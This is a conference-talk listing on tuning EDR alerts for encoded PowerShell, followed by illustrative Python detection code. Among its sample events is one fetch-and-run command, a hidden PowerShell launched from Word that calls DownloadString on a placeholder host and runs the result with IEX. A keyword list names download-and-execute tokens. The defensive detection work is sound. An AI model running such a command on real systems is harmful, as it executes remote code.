And Then There Were None (More False Positives): Writing Better EDR Detections | Cyber Defense Forum

Video: https://www.youtube.com/watch?v=3XHC3fD1PLE
Duration: 23:38

Is it possible for any security product to work properly out of the box? My experience is that a newly deployed security tool will bury analysts in false-positive alerts, leaving them with the task of either whitelisting them (which can leave the org open to false negatives) or tuning them for fidelity. Endpoint Detection and Response (EDR) tools such as Carbon Black, CrowdStrike, and Symantec EDR are no exception. This problem is exacerbated in organizations with large populations of system admins and developers. Both of these groups perform daily activities that trip alarms designed to find malicious activity. For example, encoded PowerShell is often seen as an IOC, but system admins love it. I'll go over several cases and demonstrate how to use parent processes, child processes, command-line options, and other techniques to raise the fidelity of your alerts.
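As an added illustration of the tuning approach the abstract describes (this is not code from the talk or its slides), here is a constructed encoded-PowerShell detection in its untuned form beside a version that uses the parent process, the user and the decoded command content to decide whether to alert. Every process name, account name, path and sample event below is an assumption built for the example.

```python
import base64
import re
from collections import namedtuple
# Constructed shape of an EDR process-creation event: image path, command line, parent path, user.
ProcEvent = namedtuple("ProcEvent", "image cmdline parent_image user")
# PowerShell takes -e/-ec/-enc/-EncodedCommand followed by base64 of the UTF-16LE script text.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Hypothetical tuning context; real values come from the org's own inventory of admin tooling.
APPROVED_PARENTS = {"ccmexec.exe"}       # management agent that legitimately runs encoded scripts
APPROVED_USERS = {"CORP\\svc_cfgmgr"}    # service account that agent runs as
RISKY_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe"}
RISKY_TOKENS = ("downloadstring", "invoke-expression", "iex ", "frombase64string")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):  # script text, '' if the blob will not decode, None if not encoded
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def naive_rule(ev):  # untuned: every encoded PowerShell launch is an alert
    return basename(ev.image) == "powershell.exe" and decode_encoded_command(ev.cmdline) is not None

def tuned_rule(ev):  # same trigger; parent process, user and decoded content decide whether to alert
    script = decode_encoded_command(ev.cmdline)
    if basename(ev.image) != "powershell.exe" or script is None:
        return False
    parent = basename(ev.parent_image)
    if parent in APPROVED_PARENTS and ev.user in APPROVED_USERS:
        return False  # known admin tooling under its own service account, not a blanket whitelist
    risky_content = script == "" or any(t in script.lower() for t in RISKY_TOKENS)
    return parent in RISKY_PARENTS or risky_content

def encode_ps(script):  # builds an -EncodedCommand argument the way PowerShell expects
    return base64.b64encode(script.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed: config-management agent, a developer, and a macro-spawned shell
    ProcEvent(PS, "powershell.exe -NoProfile -enc " + encode_ps("Restart-Service WinRM"),
              r"C:\Program Files\CfgMgr\ccmexec.exe", "CORP\\svc_cfgmgr"),
    ProcEvent(PS, "powershell.exe -enc " + encode_ps("Get-ChildItem -Recurse | Measure-Object"),
              r"C:\Users\dev1\AppData\Local\Programs\VS Code\Code.exe", "CORP\\dev1"),
    ProcEvent(PS, "powershell.exe -w hidden -enc " + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://x.invalid/a')"),
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "CORP\\jdoe"),
]
```

The naive rule fires on all three sample events; the tuned rule fires only on the third, where an Office process is the parent and the decoded script downloads and evaluates remote content.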

Speaker: Dan Banker, Threat Response Team Lead, Motorola Solutions

View upcoming Summits: http://www.sans.org/u/DuS
Download the presentation slides (SANS account required) at http://www.sans.org/u/195g






